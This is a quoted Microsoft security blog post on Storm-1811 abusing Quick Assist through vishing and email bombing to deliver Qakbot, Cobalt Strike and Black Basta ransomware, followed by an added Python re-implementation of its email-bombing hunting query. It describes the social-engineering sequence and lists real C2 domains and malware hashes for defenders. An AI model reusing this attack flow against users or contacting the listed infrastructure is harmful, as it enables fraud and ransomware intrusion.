[URL='https://www.microsoft.com/microsoft-365-life-hacks/privacy-and-safety/what-is-social-engineering.']social engineering attacks[/URL]. 
[HEADING=1]Social engineering[/HEADING]

One of the social engineering techniques used by threat actors to obtain initial access to target devices using Quick Assist is through vishing attacks. Vishing attacks are a form of social engineering that involves callers luring targets into revealing sensitive information under false pretenses or tricking targets into carrying out actions on behalf of the caller. For example, threat actors might attempt to impersonate IT or help desk personnel, pretending to conduct generic fixes on a device.

In other cases, threat actors initiate link listing attacks – a type of [URL='https://www.hhs.gov/sites/default/files/email-bombing-sector-alert-tlpclear.pdf']email bombing attack[/URL], where threat actors sign up targeted emails to multiple email subscription services to flood email addresses indirectly with subscribed content. Following the email flood, the threat actor impersonates IT support through phone calls to the target user, claiming to offer assistance in remediating the spam issue. During the call, the threat actor persuades the user to grant them access to their device through Quick Assist. The target user only needs to press CTRL + Windows + Q and enter the security code provided by the threat actor, as shown in the figure below.

[IMG alt="Screenshot of Quick Assist prompt to enter security code"]https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/05/Fig1-Quick-Assist.webp[/IMG]
[I]Figure 1. Quick Assist prompt to enter security code[/I]

After the target enters the security code, they receive a dialog box asking for permission to allow screen sharing. Selecting [I]Allow[/I] shares the user’s screen with the actor.

[IMG alt="Screenshot of Quick Assist dialog box asking permission to allow screen sharing"]https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/05/Fig2-Quick-Assist.webp[/IMG]
[I]Figure 2. Quick Assist dialog box asking permission to allow screen sharing[/I]

Once in the session, the threat actor can select [I]Request Control[/I], which if approved by the target, grants the actor full control of the target’s device.

[IMG alt="Screenshot of Quick Assist dialog box asking permission to allow control"]https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/05/Fig3-Quick-Assist-1024x89.webp[/IMG]
[I]Figure 3. Quick Assist dialog box asking permission to allow control[/I]

[HEADING=1]Follow-on activity leading to Black Basta ransomware[/HEADING]

Once the user allows access and control, the threat actor runs a scripted cURL command to download a series of batch files or ZIP files used to deliver malicious payloads. Some of the batch scripts observed reference installing fake spam filter updates requiring the targets to provide sign-in credentials. In several cases, Microsoft Threat Intelligence identified such activity leading to the download of Qakbot, RMM tools like ScreenConnect and NetSupport Manager, and Cobalt Strike.

[IMG alt="Screenshot of two lines of cURL commands"]https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/05/Fig4-Quick-Assist.webp[/IMG]
[I]Figure 4. Examples of cURL commands to download batch files and ZIP files[/I]

Qakbot has been used over the years as a remote access vector to deliver additional malicious payloads that led to ransomware deployment. In this recent activity, Qakbot was used to deliver a Cobalt Strike Beacon attributed to Storm-1811. ScreenConnect was used to establish persistence and conduct lateral movement within the compromised environment. NetSupport Manager is a remote access tool used by multiple threat actors to maintain control over compromised devices. An attacker might use this tool to remotely access the device, download and install additional malware, and launch arbitrary commands.
The mentioned RMM tools are commonly used by threat actors because of their extensive capabilities and ability to blend in with the environment. In some cases, the actors leveraged the OpenSSH tunneling tool to establish a secure shell (SSH) tunnel for persistence.

After the threat actor installs the initial tooling and the phone call is concluded, Storm-1811 leverages their access and performs further hands-on-keyboard activities such as domain enumeration and lateral movement. Storm-1811 then uses PsExec to deploy Black Basta ransomware throughout the network.

Black Basta is a closed ransomware offering (exclusive and not openly marketed like ransomware as a service) distributed by a small number of threat actors who typically rely on other threat actors for initial access, malicious infrastructure, and malware development. Since Black Basta first appeared in April 2022, Black Basta attackers have deployed the ransomware after receiving access from Qakbot and other malware distributors, highlighting the need for organizations to focus on attack stages prior to ransomware deployment to reduce the threat.

In the next sections, we share recommendations for improving defenses against this threat, including best practices when using Quick Assist and mitigations for reducing the impact of Black Basta and other ransomware.

[HEADING=1]Recommendations[/HEADING]

Microsoft recommends the following best practices to protect users and organizations from attacks and threat actors that misuse Quick Assist:

[LIST]
[*]Consider [URL='https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization']blocking or uninstalling[/URL] Quick Assist and other remote monitoring and management tools if these tools are not in use in your environment.
If your organization utilizes another remote support tool such as [URL='https://www.microsoft.com/security/business/endpoint-management/microsoft-intune-remote-help']Remote Help[/URL], block or remove Quick Assist as a best practice. Remote Help is part of the [URL='https://learn.microsoft.com/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization']Microsoft Intune Suite[/URL] and provides authentication and security controls for helpdesk connections.
[*]Educate users about protecting themselves from [URL='https://support.microsoft.com/windows/protect-yourself-from-tech-support-scams-2ebf91bd-f94c-2a8a-e541-f5c800d18435']tech support scams[/URL]. Tech support scams are an industry-wide issue where scammers use scare tactics to trick users into unnecessary technical support services.
[*]Only allow a helper to connect to your device using Quick Assist if you initiated the interaction by contacting Microsoft Support or your IT support staff directly. Don’t provide access to anyone claiming to have an urgent need to access your device.
[*]If you suspect that the person connecting to your device is conducting malicious activity, disconnect from the session immediately and report to your local authorities and/or any relevant IT members within your organization.
[*]Users who have been affected by a tech support scam can also use the Microsoft [URL='https://support.microsoft.com/windows/cfa4609a-92cc-4808-95e8-392b4ffd0753']technical support scam form[/URL] to report it.
[/LIST]

Microsoft recommends the following mitigations to reduce the impact of this threat:

[LIST]
[*]Educate users about [URL='https://www.microsoft.com/security/business/security-101/what-is-email-security?ocid=magicti_ta_abbreviatedmktgpage']protecting personal and business information[/URL] in social media, filtering unsolicited communication, identifying lure links in phishing emails, and reporting reconnaissance attempts and other suspicious activity.
[*]Educate users about [URL='https://www.microsoft.com/security/business/security-101/what-is-malware?ocid=magicti_ta_abbreviatedmktgpage']preventing malware infections[/URL], such as ignoring or deleting unsolicited and unexpected emails or attachments sent through instant messaging applications or social networks as well as suspicious phone calls.
[*]Invest in advanced anti-phishing solutions that monitor incoming emails and visited websites. [URL='https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-security-center-mdo?ocid=magicti_ta_learndoc']Microsoft Defender for Office 365[/URL] brings together incident and alert management across email, devices, and identities, centralizing investigations for email-based threats.
[*]Turn on [URL='https://learn.microsoft.com/defender-endpoint/enable-cloud-protection-microsoft-defender-antivirus']cloud-delivered protection[/URL] in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.
[*]Enable [URL='https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?ocid=magicti_ta_learndoc']network protection[/URL] to prevent applications or users from accessing malicious domains and other malicious content on the internet.
[*]Turn on [URL='https://learn.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection']tamper protection[/URL] features to prevent attackers from stopping security services.
[*]Enable [URL='https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations']investigation and remediation[/URL] in full automated mode to allow Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
[*]Refer to [URL='https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/']Microsoft’s human-operated ransomware overview[/URL] for general hardening recommendations against ransomware attacks.
[/LIST]

Microsoft Defender XDR customers can turn on [URL='https://learn.microsoft.com/defender-endpoint/attack-surface-reduction?ocid=magicti_ta_learndoc']attack surface reduction rules[/URL] to prevent common attack techniques:

[LIST]
[*][URL='https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference?ocid=magicti_ta_learndoc#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion']Block executable files from running unless they meet a prevalence, age, or trusted list criterion[/URL]
[*][URL='https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference?ocid=magicti_ta_learndoc#block-execution-of-potentially-obfuscated-scripts']Block execution of potentially obfuscated scripts[/URL]
[*][URL='https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-process-creations-originating-from-psexec-and-wmi-commands']Block process creations originating from PSExec and WMI commands[/URL]
[*][URL='https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference?ocid=magicti_ta_learndoc#use-advanced-protection-against-ransomware']Use advanced protection against ransomware[/URL]
[/LIST]

[HEADING=1]Detection details[/HEADING]

[HEADING=2]Microsoft Defender Antivirus[/HEADING]

Microsoft Defender Antivirus detects Qakbot downloaders, implants, and behavior as the following malware:

[LIST]
[*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:O97M/Qakbot']TrojanDownloader:O97M/Qakbot[/URL]
[*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Qbot']Trojan:Win32/QBot[/URL]
[*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Qakbot']Trojan:Win32/Qakbot[/URL]
[*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Qakbot']TrojanSpy:Win32/Qakbot[/URL]
[*][URL='https://www.microsoft.com/en-us/wdsi/threats/threat-search?query=Behavior:Win32/Qakbot.A']Behavior:Win32/Qakbot[/URL]
[/LIST]

Black Basta threat components are detected as the following:

[LIST]
[*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Basta.B&threatId=-2147132479']Behavior:Win32/Basta[/URL]
[*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Basta.AA&threatId=-2147149077']Ransom:Win32/Basta[/URL]
[*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Basta!BV&threatId=-2147142676']Trojan:Win32/Basta[/URL]
[/LIST]

Microsoft Defender Antivirus detects Beacon running on a victim process as the following:

[LIST]
[*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/CobaltStrike']Behavior:Win32/CobaltStrike[/URL]
[*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win64/CobaltStrike&threatId=-2147180169']Backdoor:Win64/CobaltStrike[/URL]
[*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool:Win64/CobaltStrike']HackTool:Win64/CobaltStrike[/URL]
[/LIST]

Additional Cobalt Strike components are detected as the following:

[LIST]
[*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDropper:PowerShell/Cobacis.A&threatId=-2147200375']TrojanDropper:PowerShell/Cobacis[/URL]
[*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/TurtleLoader.CS!dha&threatId=-2147187531']Trojan:Win64/TurtleLoader.CS[/URL]
[*][URL='https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Win32/ShellCode.BN&threatId=-2147237640']Exploit:Win32/ShellCode.BN[/URL]
[/LIST]

[HEADING=2]Microsoft Defender for Endpoint[/HEADING]

Alerts with the following title in the security center can indicate threat activity on your network:

[LIST]
[*]Suspicious activity using Quick Assist
[/LIST]

The following alerts might also indicate activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity.

[LIST]
[*]Suspicious curl behavior
[*]A file or network connection related to a ransomware-linked emerging threat activity group detected — [I]This alert captures Storm-1811 activity[/I]
[*]Ransomware-linked emerging threat activity group Storm-0303 detected — [I]This alert captures some Qakbot distributor activity[/I]
[*]Possible Qakbot activity
[*]Possible NetSupport Manager activity
[*]Possibly malicious use of proxy or tunneling tool
[*]Suspicious usage of remote management software
[*]Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)
[*]Human-operated attack using Cobalt Strike
[*]Ransomware behavior detected in the file system
[/LIST]

[HEADING=1]Indicators of compromise[/HEADING]

[B]Domain names:[/B]
[LIST]
[*]upd7a[.]com
[*]upd7[.]com
[*]upd9[.]com
[*]upd5[.]pro
[/LIST]

[B]SHA-256:[/B]
[LIST]
[*]71d50b74f81d27feefbc2bc0f631b0ed7fcdf88b1abbd6d104e66638993786f8
[*]0f9156f91c387e7781603ed716dcdc3f5342ece96e155115708b1662b0f9b4d0
[*]1ad05a4a849d7ed09e2efb38f5424523651baf3326b5f95e05f6726f564ccc30
[*]93058bd5fe5f046e298e1d3655274ae4c08f07a8b6876e61629ae4a0b510a2f7
[*]1cb1864314262e71de1565e198193877ef83e98823a7da81eb3d59894b5a4cfb
[/LIST]

[B]ScreenConnect relay:[/B]
[LIST]
[*]instance-olqdnn-relay.screenconnect[.]com
[/LIST]
[B]NetSupport C2:[/B]
[LIST]
[*]greekpool[.]com
[/LIST]

[B]Cobalt Strike Beacon C2:[/B]
[LIST]
[*]zziveastnews[.]com
[*]realsepnews[.]com
[/LIST]

[HEADING=1]Advanced hunting[/HEADING]

[HEADING=2]Microsoft Defender XDR[/HEADING]

To locate possible malicious activity, run the following query in the Microsoft Defender portal.

This query looks for possible email bombing activity:

[CODE]
EmailEvents
| where EmailDirection == "Inbound"
| make-series Emailcount = count() on Timestamp step 1h by RecipientObjectId
| extend (Anomalies, AnomalyScore, ExpectedEmails) = series_decompose_anomalies(Emailcount)
| mv-expand Emailcount, Anomalies, AnomalyScore, ExpectedEmails to typeof(double), Timestamp
| where Anomalies != 0
| where AnomalyScore >= 10
[/CODE]

[HEADING=2]Microsoft Sentinel[/HEADING]

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the [URL='https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy']Microsoft Sentinel Content Hub[/URL] to have the analytics rule deployed in their Sentinel workspace.

Microsoft Sentinel also has a range of hunting queries available in the Sentinel GitHub repo or as part of Sentinel solutions that customers can use to detect the activity detailed in this blog in addition to Microsoft Defender detections.
These hunting queries include the following:

Qakbot:
[LIST]
[*][URL='https://github.com/Azure/Azure-Sentinel/tree/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/Qakbot']Qakbot hunting queries[/URL]
[/LIST]

Cobalt Strike:
[LIST]
[*][URL='https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Attacker%20Tools%20Threat%20Protection%20Essentials/Hunting%20Queries/CobaltDNSBeacon.yaml']Cobalt Strike DNS Beaconing[/URL]
[*][URL='https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/Potential%20ransomware%20activity%20related%20to%20Cobalt%20Strike.yaml']Potential ransomware activity related to Cobalt Strike[/URL]
[*][URL='https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/FalconFriday/Analytic%20Rules/SuspiciousNamedPipes.yaml']Suspicious named pipes[/URL]
[*][URL='https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/cobalt-strike-invoked-w-wmi.yaml']Cobalt Strike Invocation using WMI[/URL]
[/LIST]

[HEADING=1]References[/HEADING]

[LIST]
[*][URL='https://www.hhs.gov/sites/default/files/email-bombing-sector-alert-tlpclear.pdf']Defense and Mitigations from E-mail Bombing[/URL]. U.S. Department of Health and Human Services, Health Sector Cybersecurity Coordination Center.
[/LIST]

[HEADING=1]Learn more[/HEADING]

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: [URL="https://aka.ms/threatintelblog"]Threat intelligence | Microsoft Security Blog[/URL].

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at [URL="https://www.linkedin.com/showcase/microsoft-threat-intelligence"]Microsoft Threat Intelligence | LinkedIn[/URL], and on X (formerly Twitter) at [URL]https://twitter.com/MsftSecIntel[/URL].
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: [URL]https://thecyberwire.com/podcasts/microsoft-threat-intelligence[/URL].

The post [URL='https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/']Threat actors misusing Quick Assist in social engineering attacks leading to ransomware[/URL] appeared first on [URL='https://www.microsoft.com/en-us/security/blog']Microsoft Security Blog[/URL].
[/QUOTE]
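The email-bombing hunt from the quoted post, re-done in plain Python as an added example (not code from the Microsoft post or from Defender): it buckets inbound mail per recipient into hourly counts the way make-series does and flags hours whose count is anomalous for that recipient, using a median/MAD robust z-score as an assumed stand-in for KQL's series_decompose_anomalies, over constructed sample rows.

```python
"""Added example, not code from the Microsoft post: re-implements the idea behind the
quoted KQL email-bombing hunt. Inbound mail is bucketed per recipient into hourly
counts (as make-series does), each series is scored with a median/MAD robust z-score
(an assumed stand-in for series_decompose_anomalies), and hours scoring >= 10 are reported."""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median

STEP = timedelta(hours=1)


def make_series(events, step=STEP):
    """Bucket inbound events into per-recipient counts over the full time range.
    Like KQL make-series, buckets with no mail are filled with 0."""
    inbound = [(ts, rcpt) for ts, direction, rcpt in events if direction == "Inbound"]
    if not inbound:
        return {}
    start = min(ts for ts, _ in inbound).replace(minute=0, second=0, microsecond=0)
    end = max(ts for ts, _ in inbound)
    buckets = []
    t = start
    while t <= end:
        buckets.append(t)
        t += step
    counts = defaultdict(lambda: [0] * len(buckets))
    for ts, rcpt in inbound:
        counts[rcpt][int((ts - start) // step)] += 1
    return {rcpt: list(zip(buckets, series)) for rcpt, series in counts.items()}


def robust_scores(values):
    """Median/MAD z-score per point. A scale of 1 is assumed when MAD is 0, so a
    perfectly flat series scores 0 instead of dividing by zero."""
    med = median(values)
    mad = median([abs(v - med) for v in values])
    scale = 1.4826 * mad if mad else 1.0
    return [(v - med) / scale for v in values]


def find_email_bombing(events, threshold=10.0):
    """Return (recipient, bucket_start, count, score) for anomalously busy hours;
    the default threshold of 10 mirrors the post's AnomalyScore >= 10 filter."""
    hits = []
    for rcpt, series in make_series(events).items():
        scores = robust_scores([c for _, c in series])
        for (bucket, count), score in zip(series, scores):
            if score >= threshold:
                hits.append((rcpt, bucket, count, round(score, 1)))
    return hits


def sample_events():
    """Constructed EmailEvents-like rows (Timestamp, EmailDirection, RecipientObjectId):
    user-a gets 2-4 mails/hour for a day, then 180 in the next hour (the flood);
    user-b gets a steady 1/hour; user-c gets a single small burst."""
    t0 = datetime(2024, 5, 1, 0, 0)
    rows = []
    for h in range(24):
        rows += [(t0 + h * STEP + timedelta(minutes=i), "Inbound", "user-a") for i in range(2 + h % 3)]
        rows.append((t0 + h * STEP, "Inbound", "user-b"))
    rows += [(t0 + 24 * STEP + timedelta(seconds=20 * i), "Inbound", "user-a") for i in range(180)]
    rows.append((t0 + 24 * STEP, "Inbound", "user-b"))
    rows += [(t0 + 10 * STEP, "Inbound", "user-c")] * 5
    rows.append((t0 + 5 * STEP, "Outbound", "user-b"))  # ignored: not inbound
    return rows
```

Only user-a's flood hour is reported; user-c's one-off burst of 5 scores below the threshold, which is the same trade-off the AnomalyScore cut-off makes in the KQL.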